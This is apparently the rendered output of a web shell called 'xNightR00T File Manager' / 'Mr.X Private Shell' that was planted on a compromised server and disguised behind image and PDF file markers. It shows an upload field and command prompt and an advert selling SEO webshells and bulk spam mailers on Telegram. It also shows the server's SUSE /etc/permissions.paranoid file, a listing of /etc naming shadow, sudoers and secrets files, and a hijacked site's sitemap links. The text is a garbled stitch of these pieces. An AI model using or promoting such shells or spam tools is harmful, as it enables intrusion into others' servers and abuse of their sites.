xNightR00T File Manager

Loading...
Current Directory:
Name Size Permission Modified Actions
Loading...
$ Waiting for command...
����JFIF��������� Mr.X
  
  __  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

ftpuser@216.73.216.168: ~ $
# /etc/permissions.paranoid
#
# Copyright (c) 2001 SuSE GmbH Nuernberg, Germany.  All rights reserved.
#
# Author: Roman Drahtmueller <draht@suse.de>, 2001
#
# 
# See /etc/permissions for general hints on how to use this file.
#
# /etc/permissions.paranoid is NOT designed to be used in a single-user as
# well as a multi-user installation, be it networked or not.
# Derived from /etc/permissions.secure, it has _all_ sgid and suid bits
# cleared - therefore, the system might be useable for non-privileged users
# except for simple tasks like changing passwords and such. In addition, 
# some of the configuration files are not readable for world any more.
#
# Feel free to use this file as a basis of a system configuration that meets
# your understanding of "secure", for the case that you're a bit paranoid.
# Since there is no such thing as "it works" with this configuration, please
# use these settings with care. Some experience on behalf of the administrator
# is needed to have a system running flawlessly when users are present.
# In particular, all terminal emulators will not be able to write to utmp
# and wtmp any more, which renders who(1) and finger(1) useless.
#
# Please always keep in mind that your system listens on network sockets
# in the default configuration. Change this by disabling the services that 
# you do not need or by restricting access to them using packet filters
# or tcp wrappers (see hosts_access(5)) to gain a higher level of security
# in your system.

#
# Directories
#
# for screen's session sockets:
/var/run/uscreens/                                      root:trusted      1775
/run/uscreens/                                      	root:trusted      1775


#
# /etc
#
/etc/crontab                                            root:root          600
/etc/exports                                            root:root          600
/etc/fstab                                              root:root          600
/etc/ftpaccess                                          root:root          600
/etc/ftpusers                                           root:root          600
/etc/rmtab                                              root:root          600
/var/lib/nfs/rmtab                                      root:root          600
/etc/syslog.conf                                        root:root          600

#
# suid system programs that need the suid bit to work:
#
/bin/su                                                 root:root         0755
# disable at and cron for non-root users
/usr/bin/at                                             root:trusted      0755
/usr/bin/crontab                                        root:trusted      0755
/usr/bin/gpasswd                                        root:shadow       0755
/usr/bin/newgrp                                         root:root         0755
/usr/bin/passwd                                         root:shadow       0755
/usr/bin/chfn                                           root:shadow       0755
/usr/bin/chage                                          root:shadow       0755
/usr/bin/chsh                                           root:shadow       0755
/usr/bin/expiry                                         root:shadow       0755
/usr/bin/sudo                                           root:root         0755
/usr/sbin/su-wrapper                                    root:root         0755
# opie password system
# #66303
/usr/bin/opiepasswd                                     root:root         0755
# "user" entries in /etc/fstab make mount work for non-root users:
/usr/bin/ncpmount                                       root:trusted      0755
/usr/bin/ncpumount                                      root:trusted      0755
# #331020
/sbin/mount.nfs                                         root:root         0755
/bin/mount                                              root:root         0755
/bin/umount                                             root:root         0755
#
# #133657
/usr/bin/fusermount                                     root:trusted      0755
# #66203
/usr/lib/majordomo/wrapper                              root:daemon       0755
# glibc backwards compatibility
/usr/lib/pt_chown                                       root:root         0755
/usr/lib64/pt_chown                                     root:root         0755
# needs setuid root when using shadow via NIS:
# #216816
/sbin/unix_chkpwd                                       root:shadow       0755
/sbin/unix2_chkpwd                                      root:shadow       0755
# qpopper
/usr/sbin/popauth                                       pop:trusted       0755
# from the squid package
/usr/sbin/pam_auth                                      root:shadow       0755

# /quid changes from bnc#891268
/var/cache/squid/                                       squid:root        0750
/var/log/squid/                                         squid:root        0750
/usr/sbin/pinger                                        root:squid        0750
/usr/sbin/basic_pam_auth                                root:shadow       0750


# still to be converted to utempter
/usr/lib/gnome-pty-helper                               root:utmp         0755

#
# mixed section: most of it is disabled in this permissions.secure:
#
# video
/usr/bin/v4l-conf                                       root:video        0755
# Itanium ia32 emulator
/usr/lib/ia32el/suid_ia32x_loader                       root:root         0755
#########################################################################
# scotty:
# #66211
/usr/bin/ntping                                         root:trusted      0755

# turned off write and wall by disabling sgid tty:
/usr/bin/wall                                           root:tty          0755
/usr/bin/write                                          root:tty          0755
# thttpd
/usr/bin/makeweb                                        root:www          0750
# yaps, pager software, accesses /dev/ttyS? . Disabled sgid uucp.
/usr/bin/yaps                                           root:uucp         0755
# ncpfs tool: trusted only
/usr/bin/nwsfind                                        root:trusted      0750
/usr/bin/ncplogin                                       root:trusted      0750
/usr/bin/ncpmap                                         root:trusted      0750
# lpdfilter:
# checks itself that only lp and root can call it
/usr/lib/lpdfilter/bin/runlpr                           root:root         0755
# pcmcia:
# Needs setuid to eject cards (#100120)
/sbin/pccardctl                                         root:trusted      0755
# gnokii nokia cellphone software
# #66209
/usr/sbin/mgnokiidev                                    root:uucp          755
# pcp, performance co-pilot
# setuid root is used to write /var/log/pcp/NOTICES
# #66205
/usr/lib/pcp/pmpost                                     root:trusted      0755
# mailman mailing list software
# #66315
/usr/lib/mailman/cgi-bin/admin                          root:mailman      0755
/usr/lib/mailman/cgi-bin/admindb                        root:mailman      0755
/usr/lib/mailman/cgi-bin/edithtml                       root:mailman      0755
/usr/lib/mailman/cgi-bin/listinfo                       root:mailman      0755
/usr/lib/mailman/cgi-bin/options                        root:mailman      0755
/usr/lib/mailman/cgi-bin/private                        root:mailman      0755
/usr/lib/mailman/cgi-bin/roster                         root:mailman      0755
/usr/lib/mailman/cgi-bin/subscribe                      root:mailman      0755
/usr/lib/mailman/cgi-bin/confirm                        root:mailman      0755
/usr/lib/mailman/cgi-bin/create                         root:mailman      0755
/usr/lib/mailman/cgi-bin/editarch                       root:mailman      0755
/usr/lib/mailman/cgi-bin/rmlist                         root:mailman      0755
/usr/lib/mailman/mail/mailman                           root:mailman      0755

# libgnomesu (#75823, #175616)
/usr/lib/libgnomesu/gnomesu-pam-backend                 root:root         0755

# control-center2 (#104993)
/usr/sbin/change-passwd                                 root:root         0755

#
# networking (need root for the privileged socket)
#
/usr/bin/ping                                           root:root         0755
/usr/bin/ping6                                          root:root         0755
# mtr is linked against ncurses.
/usr/sbin/mtr                                           root:dialout      0750
/usr/bin/rcp                                            root:root         0755
/usr/bin/rlogin                                         root:root         0755
/usr/bin/rsh                                            root:root         0755

# heartbeat #66310
# cl_status needs to be allowed to connect to the heartbeat API. If the setgid
# bit is removed, one can manually add users to the haclient group instead.
/usr/bin/cl_status                                      root:haclient     0555

# exim
/usr/sbin/exim                                          root:root         0755

#
# dialup networking programs
#
/usr/sbin/pppoe-wrapper                                 root:dialout      0750
# i4l package (#100750):
/sbin/isdnctrl                                          root:dialout      0750
# #66111
/usr/bin/vboxbeep                                       root:trusted      0755


#
# linux text console utilities
#
# setuid needed on the text console to set the terminal content on ctrl-o
# #66112
/usr/lib/mc/cons.saver                                  root:root         0755


#
# terminal emulators
# This and future SuSE products have support for the utempter, a small helper
# program that does the utmp/wtmp update work with the necessary rights.
# The use of utempter obsoletes the need for sgid bits on terminal emulator
# binaries. We mention screen here, but all other terminal emulators have
# moved to /etc/permissions, with modes set to 0755.

# framebuffer terminal emulator (japanese).
/usr/bin/jfbterm                                        root:tty          0755

#
# kde
#
# arts wrapper, normally suid root:
/opt/kde3/bin/artswrapper                               root:root         0755
# needs setuid root when using shadow via NIS:
# #66218
/opt/kde3/bin/kcheckpass                                root:shadow       0755
/usr/lib/kde4/libexec/kcheckpass                        root:shadow       0755
/usr/lib64/kde4/libexec/kcheckpass                      root:shadow       0755
# This has a meaning... hmm...
/opt/kde3/bin/kdesud                                    root:nogroup      0755
/usr/lib/kde4/libexec/kdesud                            root:nogroup      0755
/usr/lib64/kde4/libexec/kdesud                          root:nogroup      0755
/usr/lib/libexec/kf5/kdesud                             root:nogroup      0755
/usr/lib64/libexec/kf5/kdesud                           root:nogroup      0755

# used for getting proxy settings from dhcp
/opt/kde3/bin/kpac_dhcp_helper                          root:root         0755
# used to distract the oom killer
# #203535
/opt/kde3/bin/start_kdeinit                             root:root         0755
# bnc#523833
/usr/lib/kde4/libexec/start_kdeinit                     root:root         0755
/usr/lib64/kde4/libexec/start_kdeinit                   root:root         0755
# edits /etc/smb.conf
# #66312
/usr/bin/fileshareset                                   root:root         0755


#
# amanda
#
/usr/lib/amanda/calcsize                                root:amanda       0750
/usr/lib/amanda/rundump                                 root:amanda       0750
/usr/lib/amanda/runtar                                  root:amanda       0750
/usr/lib/amanda/killpgrp                                root:amanda       0750
/usr/lib/amanda/ambind                                  root:amanda       0750
/usr/lib/amanda/application/ambsdtar                    root:amanda       0750
/usr/lib/amanda/application/amgtar                      root:amanda       0750
/usr/lib/amanda/application/amstar                      root:amanda       0750

# postgresql (bsc#1123886)
# This is for older products (<=15.1), in Factory we use better settings. Don't
# port this master
/run/postgresql                                         postgres:postgres 0750
/var/run/postgresql                                     postgres:postgres 0750

#
# gnats
#
/usr/lib/gnats/gen-index                                gnats:root        0555
/usr/lib/gnats/pr-edit                                  gnats:root        0555
/usr/lib/gnats/queue-pr                                 gnats:root        0555


#
# news (inn)
#
# the inn start script changes it's uid to news:news. Later innbind
# is called by this user. Those programs do not need to be called by
# anyone else, therefore the strange permissions 4554 are required
# for operation. (#67032, #594393)
#
/usr/lib/news/bin/rnews                                 news:uucp         0555
/usr/lib/news/bin/inews                                 news:news         0555
/usr/lib/news/bin/innbind                               root:news         0555

#
# sendfax
#
# restrictive, only for "trusted" group users:
/usr/lib/mgetty+sendfax/faxq-helper                     fax:root          0755
/var/spool/fax/outgoing/                                fax:trusted       0755
/var/spool/fax/outgoing/locks                           fax:trusted       0755

#
# uucp
#
/var/spool/uucppublic/                                  root:uucp         1770
/usr/bin/uucp                                           uucp:uucp         0555
/usr/bin/uuname                                         uucp:uucp         0555
/usr/bin/uustat                                         uucp:uucp         0555
/usr/bin/uux                                            uucp:uucp         0555
/usr/lib/uucp/uucico                                    uucp:uucp         0555
/usr/lib/uucp/uuxqt                                     uucp:uucp         0555

# PolicyKit (#295341)
/usr/lib/PolicyKit/polkit-set-default-helper            root:polkituser   0755
/usr/lib/PolicyKit/polkit-read-auth-helper              root:polkituser   0755
/usr/lib/PolicyKit/polkit-revoke-helper                 root:polkituser   0755
/usr/lib/PolicyKit/polkit-explicit-grant-helper         root:polkituser   0755
/usr/lib/PolicyKit/polkit-grant-helper                  root:polkituser   0755
/usr/lib/PolicyKit/polkit-grant-helper-pam              root:polkituser   0755

# polkit new (bnc#523377)
/usr/lib/polkit-1/polkit-agent-helper-1                 root:root         0755
/usr/bin/pkexec                                         root:root         0755

# dbus-1 (#333361)
/lib/dbus-1/dbus-daemon-launch-helper                   root:messagebus   0750
/lib64/dbus-1/dbus-daemon-launch-helper                 root:messagebus   0750

# policycoreutils (#440596)
/usr/bin/newrole                                        root:root         0755

# VirtualBox (#429725)
/usr/lib/virtualbox/VirtualBox                          root:vboxusers    0755
/usr/lib/virtualbox/VirtualBox3                         root:vboxusers    0755
/usr/lib/virtualbox/VBoxBFE                             root:vboxusers    0755
/usr/lib/virtualbox/VBoxHeadless                        root:vboxusers    0755
/usr/lib/virtualbox/VBoxSDL                             root:vboxusers    0755
# (bnc#533550)
/usr/lib/virtualbox/VBoxNetAdpCtl                       root:vboxusers    0755
# bnc#669055
/usr/lib/virtualbox/VBoxNetDHCP                         root:vboxusers    0755

# open-vm-tools (bnc#474285)
/usr/bin/vmware-user-suid-wrapper			root:root         0755

# lockdev (bnc#588325)
/usr/sbin/lockdev                                       root:lock         0755

# hawk (bnc#665045)
/usr/sbin/hawk_chkpwd                                   root:haclient     0755
/usr/sbin/hawk_invoke                                   root:haclient     0755

# chromium (bnc#718016)
/usr/lib/chrome_sandbox                                 root:root         0755

# ecryptfs-utils (bnc#740110)
/sbin/mount.ecryptfs_private                            root:root         0755

# wireshark (not yet)
/usr/bin/dumpcap					root:root	  0755

# singularity (bsc#1028304)
/usr/lib/singularity/bin/expand-suid			root:singularity  0750
/usr/lib/singularity/bin/mount-suid			root:singularity  0750
/usr/lib/singularity/bin/create-suid			root:singularity  0750
/usr/lib/singularity/bin/action-suid			root:singularity  0750
/usr/lib/singularity/bin/export-suid			root:singularity  0750
/usr/lib/singularity/bin/import-suid			root:singularity  0750
# singularity version 3 (bsc#1128598)
/usr/lib/singularity/bin/starter-suid                   root:singularity  0750

#
# XXX: / -> /usr merge and sbin -> bin merge
# XXX: duplicated entries need to be cleaned up before 12.2
/usr/bin/su                                             root:root         0755
# temporary hack to make the move from coreutils to util-linux work
/usr/bin/su.core                                        root:root         0755
/usr/sbin/mount.nfs                                     root:root         0755
/usr/bin/mount.nfs                                      root:root         0755
/usr/bin/mount                                          root:root         0755
/usr/bin/umount                                         root:root         0755
/usr/sbin/unix_chkpwd                                   root:shadow       0755
/usr/bin/unix_chkpwd                                    root:shadow       0755
/usr/sbin/unix2_chkpwd                                  root:shadow       0755
/usr/bin/unix2_chkpwd                                   root:shadow       0755
/usr/sbin/isdnctrl                                      root:dialout      0755
/usr/bin/isdnctrl                                       root:dialout      0755
/usr/sbin/pccardctl                                     root:trusted      0755
/usr/bin/pccardctl                                      root:trusted      0755

# cdrecord of cdrtools from Joerg Schilling (bnc#550021)
# in paranoid mode, no provisions are made for reliable cd burning, as admins
# will have very likely prohibited that anyway.
/usr/bin/cdrecord                                       root:root       755
/usr/bin/readcd                                         root:root       755
/usr/bin/cdda2wav                                       root:root       755

# qemu-bridge-helper has no special privileges currently (bnc#765948)
/usr/lib/qemu-bridge-helper				root:root	755
/usr/lib64/qemu-bridge-helper				root:root	755


# systemd-journal (bnc#888151)
/var/log/journal/                                       root:systemd-journal	2755

#iouyap (bnc#904060)
/usr/lib/iouyap						root:iouyap	0750

# radosgw (bsc#943471)
/usr/bin/radosgw					root:root	0755

# gstreamer ptp (bsc#960173)
/usr/lib/gstreamer-1.0/gst-ptp-helper			root:root	0755
 +capabilities cap_net_bind_service=ep


#
# suexec is only secure if the document root doesn't contain files
# writeable by wwwrun. Make sure you have a safe server setup
# before setting the setuid bit! See also
# https://bugzilla.novell.com/show_bug.cgi?id=263789
# http://httpd.apache.org/docs/trunk/suexec.html
# You need to override this in permissions.local.
# suexec2 is a symlink for now, leave as-is
#
/usr/sbin/suexec            				root:root       0755

# newgidmap / newuidmap (bsc#979282)
/usr/bin/newgidmap					root:shadow	0755
/usr/bin/newuidmap					root:shadow	0755

# smc-tools (bsc#1102956)
/usr/lib/libsmc-preload.so                              root:root       0755
/usr/lib64/libsmc-preload.so                            root:root       0755

Filemanager

Name Type Size Permission Actions
ConsoleKit Folder 0755
ImageMagick Folder 0755
ImageMagick-SUSE Folder 0755
NetworkManager Folder 0755
X11 Folder 0755
YaST2 Folder 0755
aliases.d Folder 0755
alternatives Folder 0755
apache2 Folder 0755
audisp Folder 0750
audit Folder 0750
auto.master.d Folder 0755
autoinstall Folder 0700
bash_completion.d Folder 0755
binfmt.d Folder 0755
ca-certificates Folder 0755
cifs-utils Folder 0755
cron.d Folder 0755
cron.daily Folder 0755
cron.hourly Folder 0755
cron.monthly Folder 0755
cron.weekly Folder 0755
cups Folder 0755
dbus-1 Folder 0755
dconf Folder 0755
default Folder 0755
depmod.d Folder 0755
dirmngr Folder 0755
dracut.conf.d Folder 0755
fonts Folder 0755
gdbinit.d Folder 0755
gnupg Folder 0755
gpm Folder 0755
grub.d Folder 0755
gtk-3.0 Folder 0755
icewm Folder 0755
init.d Folder 0755
ipmi Folder 0755
iproute2 Folder 0755
iscsi Folder 0755
issue.d Folder 0755
java Folder 0755
joe Folder 0755
ld.so.conf.d Folder 0755
libnl Folder 0755
logrotate.d Folder 0755
logwatch Folder 0755
lvm Folder 0755
mcelog Folder 0755
modprobe.d Folder 0755
modules-load.d Folder 0755
multipath Folder 0700
my.cnf.d Folder 0755
named.d Folder 0755
netconfig.d Folder 0755
news Folder 0750
nginx Folder 0755
omc Folder 0755
one-context.d Folder 0755
openldap Folder 0755
opielocks Folder 0755
opt Folder 0755
pam.d Folder 0755
permissions.d Folder 0755
pkcs11 Folder 0755
pki Folder 0755
plymouth Folder 0755
polkit-1 Folder 0755
postfix Folder 0755
ppp Folder 0750
pptp.d Folder 0755
products.d Folder 0755
profile.d Folder 0755
pulse Folder 0755
qemu Folder 0755
rc.d Folder 0755
reader.conf.d Folder 0755
request-key.d Folder 0755
rpm Folder 0755
rsyslog.d Folder 0755
samba Folder 0755
sasl2 Folder 0755
security Folder 0755
selinux Folder 0755
sensors.d Folder 0755
skel Folder 0755
slp.reg.d Folder 0755
smartd_warning.d Folder 0755
snapper Folder 0755
snmp Folder 0755
ssh Folder 0755
ssl Folder 0755
sudoers.d Folder 0750
susehelp.d Folder 0755
sysconfig Folder 0755
sysctl.d Folder 0755
systemd Folder 0755
tmpdirs.d Folder 0755
tmpfiles.d Folder 0755
udev Folder 0755
uefi Folder 0755
unixODBC Folder 0755
uucp Folder 0750
vmware-tools Folder 0755
wicked Folder 0755
xdg Folder 0755
xinetd.d Folder 0755
zsh_completion.d Folder 0755
zypp Folder 0755
.pwd.lock File 0 B 0600
.updated File 163 B 0644
DIR_COLORS File 2.81 KB 0644
HOSTNAME File 19 B 0644
Muttrc File 152.85 KB 0644
SUSE-brand File 17 B 0644
SUSEConnect.example File 394 B 0644
SuSE-release File 215 B 0644
aclocal_dirlist File 25 B 0644
adjtime File 44 B 0644
aliases File 2.52 KB 0644
aliases.db File 12 KB 0644
at.deny File 62 B 0640
auto.master File 798 B 0644
auto.misc File 524 B 0644
auto.net File 902 B 0755
auto.smb File 2.14 KB 0755
autofs.conf File 14.02 KB 0644
autofs_ldap_auth.conf File 232 B 0600
bash.bashrc File 9.17 KB 0644
bash_command_not_found File 1.3 KB 0644
bind.keys File 1.82 KB 0644
bindresvport.blacklist File 415 B 0644
blkid.conf File 135 B 0644
bmc-snmp-proxy File 1.61 KB 0644
c-client.cf File 52 B 0644
cron.deny File 6 B 0600
crontab File 255 B 0600
cryptconfig.conf File 75 B 0644
csh.cshrc File 4.49 KB 0644
csh.login File 6.97 KB 0644
defaultdomain File 0 B 0644
dhclient.conf File 1.89 KB 0644
dhclient6.conf File 859 B 0644
dracut.conf File 117 B 0644
environment File 97 B 0644
ethers File 605 B 0644
exchange-bmc-os-info File 850 B 0644
exports File 322 B 0644
filesystems File 26 B 0644
fstab File 279 B 0644
ftpusers File 565 B 0644
gai.conf File 2.52 KB 0644
gdbinit File 211 B 0644
gemrc File 346 B 0644
generateCRL.conf File 448 B 0600
gnome_defaults.conf File 3.01 KB 0644
group File 678 B 0644
group- File 671 B 0644
host.conf File 370 B 0644
hostname File 19 B 0644
hosts File 687 B 0644
hosts.allow File 2.58 KB 0644
hosts.deny File 149 B 0644
hosts.equiv File 188 B 0644
hosts.lpd File 191 B 0644
hushlogins File 1 B 0644
idmapd.conf File 144 B 0644
inputrc File 14.56 KB 0644
insserv.conf File 171 B 0644
ipmievd File 58 B 0644
iscsid.conf File 12.74 KB 0600
issue File 78 B 0644
issue.net File 75 B 0644
krb5.conf File 771 B 0644
ld.so.cache File 49.42 KB 0644
ld.so.conf File 206 B 0644
lesskey File 899 B 0644
lesskey.bin File 405 B 0644
libaudit.conf File 191 B 0640
localtime File 351 B 0644
login.defs File 8.8 KB 0644
logrotate.conf File 517 B 0644
machine-id File 33 B 0444
magic File 113 B 0644
mail.rc File 112 B 0644
manpath.config File 11.78 KB 0644
mime.types File 100.51 KB 0644
mke2fs.conf File 808 B 0644
mkshrc File 9.17 KB 0644
motd File 1.54 KB 0644
mtab File 0 B 0444
mtools.conf File 2.09 KB 0644
my.cnf File 202 B 0644
netconfig File 767 B 0644
netgroup File 796 B 0644
netscsid.conf File 2.02 KB 0644
networks File 225 B 0644
nfsmount.conf File 3.31 KB 0644
nscd.conf File 2.33 KB 0644
nsswitch.conf File 1.16 KB 0644
ntp.conf File 3.04 KB 0640
ntp.keys File 28 B 0640
openct.conf File 2.95 KB 0644
opensc.conf File 21.6 KB 0644
opiekeys File 0 B 0600
os-release File 160 B 0644
passwd File 1.54 KB 0644
passwd- File 1.53 KB 0644
permissions File 12.08 KB 0644
permissions.easy File 18.36 KB 0644
permissions.local File 1.52 KB 0644
permissions.paranoid File 19.25 KB 0644
permissions.secure File 20.96 KB 0644
php.ini File 0 B 0644
polkit-default-privs.local File 486 B 0644
polkit-default-privs.restrictive File 37.07 KB 0644
polkit-default-privs.standard File 42.36 KB 0644
profile File 9 KB 0644
protocols File 22.71 KB 0644
python3start File 737 B 0644
pythonstart File 834 B 0644
quotagrpadmins File 220 B 0644
quotatab File 261 B 0644
raw File 221 B 0644
rc.splash File 2.64 KB 0644
rc.status File 11.5 KB 0644
request-key.conf File 1.85 KB 0644
resolv.conf File 38 B 0644
resolv.conf.netconfig File 833 B 0644
rmt File 34.83 KB 0755
rpc File 1.6 KB 0644
rsyncd.conf File 338 B 0644
rsyncd.secrets File 14 B 0600
rsyslog.conf File 4.6 KB 0600
screenrc File 127 B 0644
securetty File 161 B 0644
sensors3.conf File 9.98 KB 0644
services File 837.88 KB 0644
sestatus.conf File 216 B 0644
shadow File 790 B 0640
shadow- File 664 B 0640
shells File 268 B 0644
slp.conf File 13.41 KB 0644
slp.reg File 1.37 KB 0644
slp.spi File 2.64 KB 0644
smart_drivedb.h File 91 B 0644
smartd.conf File 6.98 KB 0644
smartd_warning.sh File 5.75 KB 0755
sudoers File 3.31 KB 0440
sysctl.conf File 560 B 0644
termcap File 1006 KB 0644
ttytype File 258 B 0644
vconsole.conf File 10 B 0644
vimrc File 7.82 KB 0644
vsftpd.conf File 7.57 KB 0600
warnquota.conf File 3.71 KB 0644
wgetrc File 4.48 KB 0644
wodim.conf File 1.31 KB 0644
xattr.conf File 654 B 0644
xinetd.conf File 1.42 KB 0644
yp.conf File 779 B 0644
zce.env File 139 B 0644
zce.rc File 169 B 0644
zprofile File 199 B 0644
zsh_command_not_found File 313 B 0644
zshenv File 45 B 0644
zshrc File 6.96 KB 0644
Σ(゚Д゚;≡;゚д゚)duo❤️a@$%^🥰&%PDF-0-1
https://vn-gateway.com/en/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-post-1.xmlhttps://vn-gateway.com/en/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-posts-page-1.xmlhttps://vn-gateway.com/wp-sitemap-posts-elementor_library-1.xmlhttps://vn-gateway.com/en/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-taxonomies-category-1.xmlhttps://vn-gateway.com/en/wp-sitemap-users-1.xmlhttps://vn-gateway.com/ja/wp-sitemap-users-1.xml